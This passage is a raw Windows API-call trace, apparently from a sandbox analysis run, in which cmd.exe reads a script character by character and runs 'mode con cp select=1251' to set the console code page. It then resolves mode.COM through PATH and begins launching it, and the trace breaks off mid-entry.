hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.928] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.928] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c4c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0175.928] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.928] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.928] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.928] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c4e, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0175.928] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.928] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.928] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.929] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c50, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0175.929] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.929] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.929] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.929] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c52, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0175.929] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.929] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.929] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.929] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c54, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0175.929] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.929] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.929] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.929] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c56, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0175.929] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.929] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.929] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.929] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c58, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0175.929] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.929] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.929] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.929] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c5a, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0175.929] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.929] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.930] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.930] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c5c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0175.930] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.930] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.930] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6e4079970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x33a02ffb68, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesRead=0x33a02ffb68*=0x1, lpOverlapped=0x0) returned 1 [0175.930] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=1, lpWideCharStr=0x7ff6e4083c5e, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0175.930] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.930] GetFileType (hFile=0x248) returned 0x3 [0175.931] _get_osfhandle (_FileHandle=0) returned 0x248 [0175.931] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0175.931] _get_osfhandle (_FileHandle=1) returned 0x254 [0175.931] GetFileType (hFile=0x254) returned 0x3 [0175.931] _get_osfhandle (_FileHandle=1) returned 0x254 [0175.931] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mode con cp select=1251\n", cchWideChar=-1, lpMultiByteStr=0x7ff6e4079970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mode con cp select=1251\n", lpUsedDefaultChar=0x0) returned 25 [0175.931] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6e4079970*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x33a02ffb08, lpOverlapped=0x0 | out: lpBuffer=0x7ff6e4079970*, lpNumberOfBytesWritten=0x33a02ffb08*=0x18, lpOverlapped=0x0) returned 1 [0175.931] GetProcessHeap () returned 0x1e82e4b0000 [0175.931] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0x4012) returned 0x1e82e4b8fe0 [0175.931] GetProcessHeap () returned 0x1e82e4b0000 [0175.931] RtlFreeHeap (HeapHandle=0x1e82e4b0000, Flags=0x0, BaseAddress=0x1e82e4b8fe0) returned 1 [0175.932] _wcsicmp (_String1="mode", _String2=")") returned 68 [0175.932] _wcsicmp (_String1="FOR", _String2="mode") returned -7 [0175.932] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7 [0175.932] _wcsicmp (_String1="IF", _String2="mode") returned -4 [0175.932] _wcsicmp (_String1="IF/?", _String2="mode") returned -4 [0175.932] _wcsicmp (_String1="REM", _String2="mode") returned 5 [0175.932] _wcsicmp (_String1="REM/?", _String2="mode") returned 5 [0175.932] GetProcessHeap () returned 0x1e82e4b0000 [0175.932] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0xb0) returned 0x1e82e4b67b0 [0175.932] GetProcessHeap () returned 0x1e82e4b0000 [0175.932] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0x1a) returned 0x1e82e4b6a50 [0175.933] GetProcessHeap () returned 0x1e82e4b0000 [0175.933] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0x38) returned 0x1e82e4b6a80 [0175.934] GetConsoleOutputCP () returned 0x1b5 [0176.801] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6e407fbb0 | out: lpCPInfo=0x7ff6e407fbb0) returned 1 [0176.801] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.495] GetConsoleTitleW (in: lpConsoleTitle=0x33a02ff950, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0180.106] malloc (_Size=0xffce) returned 0x1e82e3d0840 [0180.106] ??_V@YAXPEAX@Z () returned 0x1e82e3d0840 [0180.106] malloc (_Size=0xffce) returned 0x1e82e3e0820 [0180.107] ??_V@YAXPEAX@Z () returned 0x1e82e3e0820 [0180.108] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0180.108] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0180.108] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0180.108] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0180.108] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0180.108] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0180.108] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0180.108] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0180.108] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0180.108] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0180.109] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0180.109] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0180.109] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0180.109] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0180.109] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0180.109] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0180.109] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0180.109] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0180.109] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0180.109] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0180.109] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0180.109] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0180.109] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0180.109] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0180.109] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0180.109] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0180.109] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0180.109] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0180.109] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0180.109] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0180.109] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0180.109] _wcsicmp (_String1="mode", _String2="START") returned -6 [0180.109] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0180.109] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0180.109] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0180.109] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0180.109] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0180.109] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0180.109] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0180.110] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0180.110] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0180.110] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0180.110] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0180.110] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0180.110] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0180.110] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0180.110] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0180.110] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0180.110] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0180.110] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0180.110] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0180.110] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0180.110] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0180.110] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0180.110] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0180.110] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0180.110] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0180.110] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0180.110] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0180.110] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0180.110] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0180.110] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0180.110] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0180.110] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0180.110] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0180.110] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0180.110] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0180.111] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0180.111] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0180.111] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0180.111] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0180.111] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0180.111] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0180.111] _wcsicmp (_String1="mode", _String2="START") returned -6 [0180.111] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0180.111] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0180.111] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0180.111] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0180.111] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0180.111] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0180.111] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0180.111] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0180.111] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0180.111] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0180.111] _wcsicmp (_String1="mode", _String2="FOR") returned 7 [0180.111] _wcsicmp (_String1="mode", _String2="IF") returned 4 [0180.111] _wcsicmp (_String1="mode", _String2="REM") returned -5 [0180.111] ??_V@YAXPEAX@Z () returned 0x1 [0180.111] GetProcessHeap () returned 0x1e82e4b0000 [0180.112] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0xffde) returned 0x1e82e4b8fe0 [0180.113] GetProcessHeap () returned 0x1e82e4b0000 [0180.113] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0x42) returned 0x1e82e4b19f0 [0180.113] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0180.113] malloc (_Size=0xffce) returned 0x1e82e3e0820 [0180.113] ??_V@YAXPEAX@Z () returned 0x1e82e3e0820 [0180.113] GetProcessHeap () returned 0x1e82e4b0000 [0180.113] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0x1ffac) returned 0x1e82e4c8fd0 [0180.116] SetErrorMode (uMode=0x0) returned 0x0 [0180.116] SetErrorMode (uMode=0x1) returned 0x0 [0180.116] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1e82e4c8fe0, lpFilePart=0x33a02ff1d0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x33a02ff1d0*="Desktop") returned 0x17 [0180.116] SetErrorMode (uMode=0x0) returned 0x1 [0180.116] GetProcessHeap () returned 0x1e82e4b0000 [0180.116] RtlReAllocateHeap (Heap=0x1e82e4b0000, Flags=0x0, Ptr=0x1e82e4c8fd0, Size=0x4a) returned 0x1e82e4c8fd0 [0180.116] GetProcessHeap () returned 0x1e82e4b0000 [0180.116] RtlSizeHeap (HeapHandle=0x1e82e4b0000, Flags=0x0, MemoryPointer=0x1e82e4c8fd0) returned 0x4a [0180.116] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6e407bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0180.116] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0180.116] GetProcessHeap () returned 0x1e82e4b0000 [0180.117] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0x1bc) returned 0x1e82e4b8320 [0180.117] GetProcessHeap () returned 0x1e82e4b0000 [0180.117] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0x368) returned 0x1e82e4c9030 [0180.128] GetProcessHeap () returned 0x1e82e4b0000 [0180.128] RtlReAllocateHeap (Heap=0x1e82e4b0000, Flags=0x0, Ptr=0x1e82e4c9030, Size=0x1be) returned 0x1e82e4c9030 [0180.128] GetProcessHeap () returned 0x1e82e4b0000 [0180.128] RtlSizeHeap (HeapHandle=0x1e82e4b0000, Flags=0x0, MemoryPointer=0x1e82e4c9030) returned 0x1be [0180.128] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6e407bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0180.128] GetProcessHeap () returned 0x1e82e4b0000 [0180.128] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0xe8) returned 0x1e82e4b6c30 [0180.131] GetProcessHeap () returned 0x1e82e4b0000 [0180.131] RtlReAllocateHeap (Heap=0x1e82e4b0000, Flags=0x0, Ptr=0x1e82e4b6c30, Size=0x7e) returned 0x1e82e4b6c30 [0180.131] GetProcessHeap () returned 0x1e82e4b0000 [0180.131] RtlSizeHeap (HeapHandle=0x1e82e4b0000, Flags=0x0, MemoryPointer=0x1e82e4b6c30) returned 0x7e [0180.131] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0180.131] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x33a02fef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33a02fef40) returned 0xffffffffffffffff [0180.132] GetLastError () returned 0x2 [0180.132] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0180.132] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x33a02fef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33a02fef40) returned 0xffffffffffffffff [0180.136] GetLastError () returned 0x2 [0180.136] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0180.136] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x33a02fef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33a02fef40) returned 0x1e82e4b1a40 [0180.136] GetProcessHeap () returned 0x1e82e4b0000 [0180.136] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x0, Size=0x28) returned 0x1e82e4b6cc0 [0180.136] FindClose (in: hFindFile=0x1e82e4b1a40 | out: hFindFile=0x1e82e4b1a40) returned 1 [0180.137] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x33a02fef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33a02fef40) returned 0x1e82e4b1a40 [0180.137] GetProcessHeap () returned 0x1e82e4b0000 [0180.137] RtlReAllocateHeap (Heap=0x1e82e4b0000, Flags=0x0, Ptr=0x1e82e4b6cc0, Size=0x8) returned 0x1e82e4b6cc0 [0180.137] FindClose (in: hFindFile=0x1e82e4b1a40 | out: hFindFile=0x1e82e4b1a40) returned 1 [0180.137] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0180.137] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0180.137] ??_V@YAXPEAX@Z () returned 0x1 [0180.137] GetConsoleTitleW (in: lpConsoleTitle=0x33a02ff4c0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0180.371] GetProcessHeap () returned 0x1e82e4b0000 [0180.371] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0x21c) returned 0x1e82e4b6cf0 [0180.371] GetConsoleTitleW (in: lpConsoleTitle=0x1e82e4b6d00, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0180.378] GetProcessHeap () returned 0x1e82e4b0000 [0180.378] RtlReAllocateHeap (Heap=0x1e82e4b0000, Flags=0x0, Ptr=0x1e82e4b6cf0, Size=0xaa) returned 0x1e82e4b6cf0 [0180.378] GetProcessHeap () returned 0x1e82e4b0000 [0180.378] RtlSizeHeap (HeapHandle=0x1e82e4b0000, Flags=0x0, MemoryPointer=0x1e82e4b6cf0) returned 0xaa [0180.378] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe - mode con cp select=1251") returned 1 [0180.422] GetProcessHeap () returned 0x1e82e4b0000 [0180.422] RtlFreeHeap (HeapHandle=0x1e82e4b0000, Flags=0x0, BaseAddress=0x1e82e4b6cf0) returned 1 [0180.422] InitializeProcThreadAttributeList (in: lpAttributeList=0x33a02ff3e0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x33a02ff2d0 | out: lpAttributeList=0x33a02ff3e0, lpSize=0x33a02ff2d0) returned 1 [0180.422] UpdateProcThreadAttribute (in: lpAttributeList=0x33a02ff3e0, dwFlags=0x0, Attribute=0x60001, lpValue=0x33a02ff2bc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x33a02ff3e0, lpPreviousValue=0x0) returned 1 [0180.422] GetStartupInfoW (in: lpStartupInfo=0x33a02ff370 | out: lpStartupInfo=0x33a02ff370*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x248, hStdOutput=0x254, hStdError=0x254)) [0180.423] GetProcessHeap () returned 0x1e82e4b0000 [0180.423] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0x20) returned 0x1e82e4b1a40 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0180.423] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0180.424] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0180.424] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0180.424] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0180.424] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0180.424] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0180.424] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0180.424] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0180.424] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0180.424] _wcsnicmp (_String1="COPYCMD", 